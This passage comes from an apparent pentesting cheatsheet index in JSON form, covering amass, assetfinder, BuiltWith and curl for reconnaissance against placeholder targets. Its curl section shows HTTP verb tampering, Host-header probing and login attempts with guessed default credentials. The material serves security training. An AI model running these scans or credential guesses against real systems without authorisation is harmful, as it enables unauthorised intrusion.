\u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eConfig file path\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-dir \u0026lt;path\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDirectory for output/database\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"intel--org-recon\"\u003eintel — Org Recon\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find domains by organisation name\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass intel -org \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Target Corp\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Reverse whois\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass intel -whois -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# ASN lookup\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass intel -asn \u003cspan style=\"color:#ae81ff\"\u003e12345\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find domains from IP/CIDR\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass intel -ip 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find ASN from domain\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass intel -d example.com -whois\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"configuration-file\"\u003eConfiguration File\u003c/h2\u003e\n\u003cp\u003eConfig file at \u003ccode\u003e~/.config/amass/config.ini\u003c/code\u003e (or specify with \u003ccode\u003e-config\u003c/code\u003e):\u003c/p\u003e","title":"amass"},{"content":"assetfinder Cheatsheet Type: Simple, lightweight subdomain finder using multiple passive data sources — ideal for quick recon\nInstallation go install github.com/tomnomnom/assetfinder@latest # Binary ends up in ~/go/bin/assetfinder # Or download pre-built binary wget https://github.com/tomnomnom/assetfinder/releases/latest/download/assetfinder-linux-amd64.tgz tar xf assetfinder-linux-amd64.tgz mv assetfinder /usr/local/bin/ Basic Usage assetfinder \u0026lt;domain\u0026gt; assetfinder example.com Flags Flag Description --subs-only Show only subdomains (filter out related domains / TLD variants) Common Commands # All results (subdomains + related domains) assetfinder example.com # Subdomains only (most common usage) assetfinder --subs-only example.com # Save to file assetfinder --subs-only example.com \u0026gt; subdomains.txt # Multiple domains from stdin cat domains.txt | xargs -I{} assetfinder --subs-only {} # Pipe into other tools assetfinder --subs-only example.com | httprobe # Check live hosts assetfinder --subs-only example.com | sort -u # Deduplicate Data Sources Used crt.sh (Certificate transparency logs) certspotter (SSL cert monitoring) hackertarget (Passive DNS) threatcrowd (Threat intelligence) wayback (Wayback Machine / archive.org) dnsdumpster (DNS recon service) facebook CT (Facebook certificate transparency) virustotal (Passive DNS) findsubdomains.com Pipeline Examples # Find subdomains → probe for live web servers → save assetfinder --subs-only example.com | httprobe | tee live_hosts.txt # Find subdomains → resolve to IPs assetfinder --subs-only example.com | \\ xargs -I{} dig +short {} | grep -v \u0026#34;^$\u0026#34; | sort -u # Find subdomains → run nmap on live ones assetfinder --subs-only example.com | \\ httprobe | sed \u0026#39;s/https\\?:\\/\\///\u0026#39; | \\ xargs -I{} nmap -p 80,443 {} # Combine with other tools for coverage (assetfinder --subs-only example.com; \\ subfinder -d example.com -silent; \\ amass enum -passive -d example.com) | sort -u \u0026gt; all_subs.txt Notes Passive only — does not brute force DNS or make queries to the target Fast and lightweight — great first pass before heavier tools No API keys needed for most sources (some may be rate-limited) Output may contain duplicates — always pipe through sort -u ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/assetfinder/","summary":"\u003ch1 id=\"assetfinder-cheatsheet\"\u003eassetfinder Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Simple, lightweight subdomain finder using multiple passive data sources — ideal for quick recon\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install github.com/tomnomnom/assetfinder@latest\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Binary ends up in ~/go/bin/assetfinder\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Or download pre-built binary\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewget https://github.com/tomnomnom/assetfinder/releases/latest/download/assetfinder-linux-amd64.tgz\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etar xf assetfinder-linux-amd64.tgz\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emv assetfinder /usr/local/bin/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"flags\"\u003eFlags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--subs-only\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow only subdomains (filter out related domains / TLD variants)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# All results (subdomains + related domains)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Subdomains only (most common usage)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save to file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com \u0026gt; subdomains.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multiple domains from stdin\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecat domains.txt | xargs -I\u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e assetfinder --subs-only \u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pipe into other tools\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | httprobe \u003cspan style=\"color:#75715e\"\u003e# Check live hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | sort -u \u003cspan style=\"color:#75715e\"\u003e# Deduplicate\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"data-sources-used\"\u003eData Sources Used\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ecrt.sh (Certificate transparency logs)\ncertspotter (SSL cert monitoring)\nhackertarget (Passive DNS)\nthreatcrowd (Threat intelligence)\nwayback (Wayback Machine / archive.org)\ndnsdumpster (DNS recon service)\nfacebook CT (Facebook certificate transparency)\nvirustotal (Passive DNS)\nfindsubdomains.com\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"pipeline-examples\"\u003ePipeline Examples\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find subdomains → probe for live web servers → save\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | httprobe | tee live_hosts.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find subdomains → resolve to IPs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e xargs -I\u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e dig +short \u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e | grep -v \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;^\u003c/span\u003e$\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e | sort -u\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find subdomains → run nmap on live ones\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e httprobe | sed \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;s/https\\?:\\/\\///\u0026#39;\u003c/span\u003e | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e xargs -I\u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e nmap -p 80,443 \u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Combine with other tools for coverage\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eassetfinder --subs-only example.com; \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e subfinder -d example.com -silent; \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e amass enum -passive -d example.com\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e | sort -u \u0026gt; all_subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"notes\"\u003eNotes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePassive only\u003c/strong\u003e — does not brute force DNS or make queries to the target\u003c/li\u003e\n\u003cli\u003eFast and lightweight — great first pass before heavier tools\u003c/li\u003e\n\u003cli\u003eNo API keys needed for most sources (some may be rate-limited)\u003c/li\u003e\n\u003cli\u003eOutput may contain duplicates — always pipe through \u003ccode\u003esort -u\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e","title":"assetfinder"},{"content":"BuiltWith Cheatsheet Purpose: Passive technology profiling of a domain — current stack plus historical changes, hosting, analytics, ad networks, ecommerce, CDN, certificates, and more. Useful for OSINT recon without touching the target.\nFormat: Web service (free tier + paid API). No local install required for basic lookups.\nAccess Points Surface URL Profile lookup (single domain) https://builtwith.com/ Free quick lookup https://builtwith.com/? Trends / market share https://trends.builtwith.com/ Relationships (same owner / IDs) https://builtwith.com/relationships/ Redirect graph https://builtwith.com/redirect/ API docs (paid) https://api.builtwith.com/ Browser extension (Chrome/Firefox) search \u0026ldquo;BuiltWith Technology Profiler\u0026rdquo; in store Quick CLI Lookups (no API key required) # Open profile in default browser xdg-open \u0026#34;https://builtwith.com/target.tld\u0026#34; # Scrape the public profile page (limited; HTML changes) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \u0026#34;https://builtwith.com/target.tld\u0026#34; -o builtwith.html # Extract technology names (rough) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \u0026#34;https://builtwith.com/target.tld\u0026#34; \\ | grep -oE \u0026#39;href=\u0026#34;/[a-z0-9-]+\u0026#34;[^\u0026gt;]*\u0026gt;[^\u0026lt;]+\u0026#39; | sort -u For reliable structured data, use the paid API below.\nAPI (Paid) — Cheatsheet Set BW_KEY in your env first:\nexport BW_KEY=\u0026#34;\u0026lt;your-api-key\u0026gt;\u0026#34; Domain API — current tech stack curl -s \u0026#34;https://api.builtwith.com/v21/api.json?KEY=$BW_KEY\u0026amp;LOOKUP=target.tld\u0026#34; | jq . Free API — current snapshot only curl -s \u0026#34;https://api.builtwith.com/free1/api.json?KEY=$BW_KEY\u0026amp;LOOKUP=target.tld\u0026#34; | jq . Domains API — find sites using a tech curl -s \u0026#34;https://api.builtwith.com/lists7/api.json?KEY=$BW_KEY\u0026amp;TECH=Shopify\u0026#34; | jq . Relationships API — sites sharing analytics / ad IDs curl -s \u0026#34;https://api.builtwith.com/rv1/api.json?KEY=$BW_KEY\u0026amp;LOOKUP=target.tld\u0026#34; | jq . Trends API — adoption stats for a tech curl -s \u0026#34;https://api.builtwith.com/trends/v6/api.json?KEY=$BW_KEY\u0026amp;TECH=WordPress\u0026#34; | jq . What It Reveals Tech stack: CMS, frameworks, JS libs, web server, OS hints Analytics / advertising: Google Analytics IDs, GTM, Meta pixel, Hotjar, ad networks Hosting / infra: ASN, hosting provider, CDN, DNS provider, certificate issuer Ecommerce: platform, payment processors, shipping integrations Email / marketing: SPF/DKIM hints, ESP (Mailchimp, SendGrid), CRM Historical changes: when a tech was added/removed (premium tier) Relationships: other domains owned by the same entity (shared GA ID, AdSense ID, etc.) — strong OSINT pivot OSINT Pivots # Same Google Analytics ID → likely same owner # Profile page → \u0026#34;Relationship Profile\u0026#34; → list of sibling domains xdg-open \u0026#34;https://builtwith.com/relationships/target.tld\u0026#34; # Redirect chain history xdg-open \u0026#34;https://builtwith.com/redirect/target.tld\u0026#34; Tips Passive only. BuiltWith fetched the target previously; you don\u0026rsquo;t touch it. Historical tech list is great for guessing legacy stacks left exposed on subdomains. Shared GA / AdSense IDs are a classic attribution pivot — confirm with crt.sh, WHOIS, and DNS. Free tier limits depth — for active engagements, combine with [[wappalyzer]] and [[whatweb]] to get current ground truth. BuiltWith data can be stale; verify versions before basing exploitation on them. Related [[wappalyzer]] — live tech detection from your browser. [[whatweb]] — active CLI fingerprinting. [[netcraft]] — hosting / SSL / OS history with strong passive recon overlap. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/builtwith/","summary":"\u003ch1 id=\"builtwith-cheatsheet\"\u003eBuiltWith Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Passive technology profiling of a domain — current stack plus historical changes, hosting, analytics, ad networks, ecommerce, CDN, certificates, and more. Useful for OSINT recon without touching the target.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFormat:\u003c/strong\u003e Web service (free tier + paid API). No local install required for basic lookups.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"access-points\"\u003eAccess Points\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSurface\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eURL\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eProfile lookup (single domain)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/\"\u003ehttps://builtwith.com/\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eFree quick lookup\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/\"\u003ehttps://builtwith.com/\u003c/a\u003e?\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eTrends / market share\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://trends.builtwith.com/\"\u003ehttps://trends.builtwith.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eRelationships (same owner / IDs)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/relationships/\"\u003ehttps://builtwith.com/relationships/\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eRedirect graph\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/redirect/\"\u003ehttps://builtwith.com/redirect/\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAPI docs (paid)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://api.builtwith.com/\"\u003ehttps://api.builtwith.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eBrowser extension (Chrome/Firefox)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003esearch \u0026ldquo;BuiltWith Technology Profiler\u0026rdquo; in store\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"quick-cli-lookups-no-api-key-required\"\u003eQuick CLI Lookups (no API key required)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Open profile in default browser\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://builtwith.com/target.tld\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scrape the public profile page (limited; HTML changes)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://builtwith.com/target.tld\u0026#34;\u003c/span\u003e -o builtwith.html\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Extract technology names (rough)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://builtwith.com/target.tld\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e | grep -oE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;href=\u0026#34;/[a-z0-9-]+\u0026#34;[^\u0026gt;]*\u0026gt;[^\u0026lt;]+\u0026#39;\u003c/span\u003e | sort -u\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eFor reliable structured data, use the \u003cstrong\u003epaid API\u003c/strong\u003e below.\u003c/p\u003e","title":"builtwith"},{"content":"curl Cheatsheet (Web Fingerprinting) Purpose: Manual HTTP(S) requests for header inspection, banner grabbing, fingerprinting and quick endpoint testing.\nCore Flags Flag Description -I HEAD request (headers only) -i Include response headers in output -v Verbose (request + response, TLS info) -vv / --trace-ascii - Full wire trace -s Silent (no progress meter) -S Show errors even with -s -L Follow redirects -k / --insecure Ignore TLS cert errors -o \u0026lt;file\u0026gt; Write body to file -O Save with remote filename -A \u0026lt;ua\u0026gt; Set User-Agent -e \u0026lt;ref\u0026gt; Set Referer -H \u0026quot;\u0026lt;hdr\u0026gt;: \u0026lt;val\u0026gt;\u0026quot; Custom header (repeatable) -X \u0026lt;METHOD\u0026gt; HTTP method (GET, POST, PUT, DELETE, etc.) -d \u0026lt;data\u0026gt; POST body (application/x-www-form-urlencoded) --data-raw POST body without @/\u0026amp; interpretation --data-binary POST body as-is (preserve newlines) -F \u0026lt;field\u0026gt;=\u0026lt;val\u0026gt; Multipart form upload -b \u0026lt;cookie\u0026gt; / -c \u0026lt;file\u0026gt; Send cookie / save cookies -u user:pass HTTP Basic auth -x \u0026lt;proxy\u0026gt; Use proxy (e.g. http://127.0.0.1:8080) --resolve host:port:ip Force DNS resolution (Host-header testing) --max-time \u0026lt;s\u0026gt; Hard timeout --connect-timeout \u0026lt;s\u0026gt; Connect timeout -w \u0026quot;\u0026lt;format\u0026gt;\u0026quot; Write-out format (timings, codes) Banner Grabbing / Header Inspection curl -I https://target.tld # HEAD: server, framework, cookies curl -sI https://target.tld | grep -iE \u0026#39;server|x-powered-by|x-aspnet|via|set-cookie\u0026#39; curl -sIL https://target.tld # Follow redirects, show every hop curl -v https://target.tld 2\u0026gt;\u0026amp;1 | grep -iE \u0026#39;^\u0026lt; \u0026#39; # All response headers Verbose / TLS Inspection curl -v https://target.tld # Cert chain, ALPN, ciphers curl -vk https://target.tld # Ignore cert errors curl --trace-ascii trace.log https://target.tld # Full request/response dump curl -v --tls-max 1.2 https://target.tld # Pin max TLS version Method / Verb Tampering curl -X OPTIONS -i https://target.tld/ # Allowed methods curl -X PUT -d \u0026#34;test\u0026#34; -i https://target.tld/file.txt curl -X DELETE -i https://target.tld/resource/1 curl -X TRACE -i https://target.tld/ # Cross-Site Tracing check Virtual Host / Host Header Testing curl -s -H \u0026#34;Host: dev.target.tld\u0026#34; http://\u0026lt;ip\u0026gt;/ -o dev.html curl -sI --resolve target.tld:443:\u0026lt;ip\u0026gt; https://target.tld/ curl -s -H \u0026#34;Host: admin.internal\u0026#34; http://\u0026lt;ip\u0026gt;/ # Find vhosts on shared IP Cookies \u0026amp; Sessions curl -c cookies.txt -b cookies.txt https://target.tld/login curl -b \u0026#34;session=abcd1234\u0026#34; https://target.tld/dashboard curl -c - https://target.tld/ # Print Set-Cookie to stdout Authentication curl -u admin:password https://target.tld/admin # Basic curl -H \u0026#34;Authorization: Bearer \u0026lt;jwt\u0026gt;\u0026#34; https://api.target.tld/ curl --ntlm -u \u0026#39;DOMAIN\\user:pass\u0026#39; https://target.tld/ curl --digest -u user:pass https://target.tld/ POST / API Testing # Form data curl -X POST -d \u0026#34;user=admin\u0026amp;pass=admin\u0026#34; https://target.tld/login # Raw JSON curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;user\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;pass\u0026#34;:\u0026#34;admin\u0026#34;}\u0026#39; \\ https://target.tld/api/login # File from disk curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; \\ --data-binary @payload.json https://target.tld/api # Multipart upload curl -F 